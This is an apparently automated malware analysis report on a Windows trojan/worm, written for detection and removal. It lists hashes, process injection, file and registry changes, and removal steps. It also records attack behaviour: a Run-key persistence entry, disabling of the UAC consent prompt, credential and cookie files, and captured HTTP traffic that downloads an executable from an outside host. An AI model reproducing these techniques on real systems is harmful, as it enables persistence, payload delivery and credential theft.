Gen.Variant.Zusy.187112_4ec9b2b7c1

by malwarelabrobot on February 26th, 2017 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.187112 (B) (Emsisoft), Gen:Variant.Zusy.187112 (AdAware), Trojan.Win32.Swrort.3.FD, Worm.Win32.AutoIt.FD, WormAutoItGen.YR (Lavasoft MAS)
Behaviour: Trojan, Worm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 4ec9b2b7c126b528677573a2c2dfe0b8
SHA1: 40779b0cb282d94650889b8ba8971e263914b6dd
SHA256: 90e517b1c3818b7e6c220ffbbba9f0f784f74f077239dfc67a9173604c3b966c
SSDeep: 12288:PMf1u7opqAqRMgK6rP21XBhnyjMTy4T7SYtjlGbiYpF7Wo5S:PMf87opgMgK6rPLjMT39lGuYpNF5S
Size: 686080 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company:
Created at: 2016-04-03 01:51:45
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

systeminfo.exe:2876
netsh.exe:3392
netsh.exe:3008
rundll32.exe:1912

The Trojan injects its code into the following process(es):

ntvdm.exe:952
nwtray.exe:1456
RegAsm.exe:1676
RegAsm.exe:2124
%original file name%.exe:3584
nvvswc.exe:4084

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ntvdm.exe:952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7790.tmp (335 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs786B.tmp (269 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7790.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs786B.tmp (0 bytes)

The process nwtray.exe:1456 makes changes in the file system.
The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nwtray.exe (0 bytes)

The process RegAsm.exe:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uwvcbwk (1960 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut53F9.tmp (588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\pass.exe (773 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Passwords.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uwvcbwk (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut53F9.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe (0 bytes)

The process RegAsm.exe:2124 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Passwords.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2B15.tmp (588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Cookies.sqlite (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\icanhazip_com[1].txt (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jhpcqgh (1960 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2B15.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jhpcqgh (0 bytes)

The process rundll32.exe:1912 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\T3SAKMRE\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VJOQ962C\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\9M0U960C\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\Q9A9DPUD\desktop.ini (67 bytes)

The process %original file name%.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nwtray.exe (4545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nvvswc.exe (9 bytes)

Registry activity

The process systeminfo.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E\@%SystemRoot%\system32]
"mlang.dll,-4386" = "English (United States)"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

The process RegAsm.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"TaskbarNoNotification" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 DF 6B EF 77 8F D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dllhost" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\AutoUpdate.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process RegAsm.exe:2124 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
"WpadDecisionTime" = "30 74 F1 ED 77 8F D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "30 74 F1 ED 77 8F D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\RegAsm_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]
"TaskbarNoNotification" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"dllhost" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\AutoUpdate.exe"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process netsh.exe:3392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E\@%SystemRoot%\system32]
"napipsec.dll,-4" = "1.0"
"eapqec.dll,-103" = "Microsoft Corporation"
"tsgqec.dll,-100" = "RD Gateway Quarantine Enforcement Client"
"tsgqec.dll,-103" = "Microsoft Corporation"
"napipsec.dll,-1" = "IPsec Relying Party"
"napipsec.dll,-2" = "Provides IPsec based enforcement for Network Access Protection"
"napipsec.dll,-3" = "Microsoft Corporation"
"eapqec.dll,-100" = "EAP Quarantine Enforcement Client"
"eapqec.dll,-101" = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."
"tsgqec.dll,-101" = "Provides RD Gateway enforcement for NAP"
"eapqec.dll,-102" = "1.0"
"dhcpqec.dll,-101" = "Provides DHCP based enforcement for NAP"
"dhcpqec.dll,-100" = "DHCP Quarantine Enforcement Client"
"dhcpqec.dll,-103" = "1.0"
"dhcpqec.dll,-102" = "Microsoft Corporation"
"tsgqec.dll,-102" = "1.0"

The process netsh.exe:3008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Local Settings\MuiCache\2F\52C64B7E]
"LanguageList" = "en-US, en"

The process %original file name%.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process nvvswc.exe:4084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
278edbd499374bf73621f8c1f969d894 c:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe
59620c65f453f333275e6d417de34d68 c:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nvvswc.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Hamrick Software
Product Name: mycathedral
Product Version: 11.8.723
Legal Copyright: Copyright 2016 Hamrick Software
Legal Trademarks:
Original Filename:
Internal Name: mycathedral.exe
File Version: 11.8.723
File Description: Turbo Studio 16
Comments: VueScan
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 680676 680960 5.50529 245c32ce5d2c6d6163997c93e2d124d2
.rsrc 696320 4096 4096 3.4005 7f14182fda50a32a66cd01899658e3cb
.reloc 704512 12 512 0.070639 b3ddc6e72939d93b299d5faff902386b

URLs

URL IP
hxxp://0v3rfl0w.com/overflow.exe 50.63.202.83
hxxp://icanhazip.com/ 64.182.208.184


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
ET POLICY Internal Host Retrieving External IP via icanhazip.com - Possible Infection
ET TROJAN AutoIt Downloading EXE - Likely Malicious

Traffic

GET / HTTP/1.1
User-Agent: AutoIt
Host: icanhazip.com


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 25 Feb 2017 15:00:42 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 15
Connection: close
X-SECURITY: This site doesn't distribute malware. Get the facts. hXXps://is.gd/1LWdFz
X-RTFM: Learn about this site at hXXp://bit.ly/icanhazip-faq and don't abuse the service.
X-BECOME-A-RACKER: If you're reading this, apply here: hXXps://VVV.rackspace.com/talent/
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
194.242.96.226...


GET /overflow.exe HTTP/1.1
User-Agent: AutoIt
Host: 0v3rfl0w.com


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 25 Feb 2017 15:00:51 GMT
Content-Length: 773
Age: 0
Connection: keep-alive

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

RegAsm.exe_2124:


RegAsm.exe_2124_rwx_00400000_00121000:


conhost.exe_1856:


%original file name%.exe_3584_rwx_69722000_00002000:

.ri3J
-yiq.yiw
-yiq.yi

nvvswc.exe_4084_rwx_69722000_00002000:

.ri3J
-yiq.yiw
-yiq.yi

RegAsm.exe_1676:


TrustedInstaller.exe_2956:


nwtray.exe_1456_rwx_69722000_00002000:

.ri3J
-yiq.yiw
-yiq.yi

RegAsm.exe_1676_rwx_00400000_00121000:


conhost.exe_2512:


ntvdm.exe_952:


ntvdm.exe_952_rwx_00000000_00010000:


ntvdm.exe_952_rwx_00010000_00090000:


ntvdm.exe_952_rwx_000A0000_0002B000:


ntvdm.exe_952_rwx_000CB000_00011000:


ntvdm.exe_952_rwx_000DC000_0000C000:


ntvdm.exe_952_rwx_000E8000_00008000:


ntvdm.exe_952_rwx_000F0000_00010000:


ntvdm.exe_952_rwx_00100000_00010000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    systeminfo.exe:2876
    netsh.exe:3392
    netsh.exe:3008
    rundll32.exe:1912

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7790.tmp (335 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs786B.tmp (269 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\uwvcbwk (1960 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut53F9.tmp (588 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\dllhost.exe (53 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\pass.exe (773 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Passwords.txt (0 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aut2B15.tmp (588 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\Cookies.sqlite (3073 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\icanhazip_com[1].txt (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\jhpcqgh (1960 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\T3SAKMRE\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VJOQ962C\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\9M0U960C\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\Q9A9DPUD\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nwtray.exe (4545 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\WinRAR\nvvswc.exe (9 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "dllhost" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\log\AutoUpdate.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
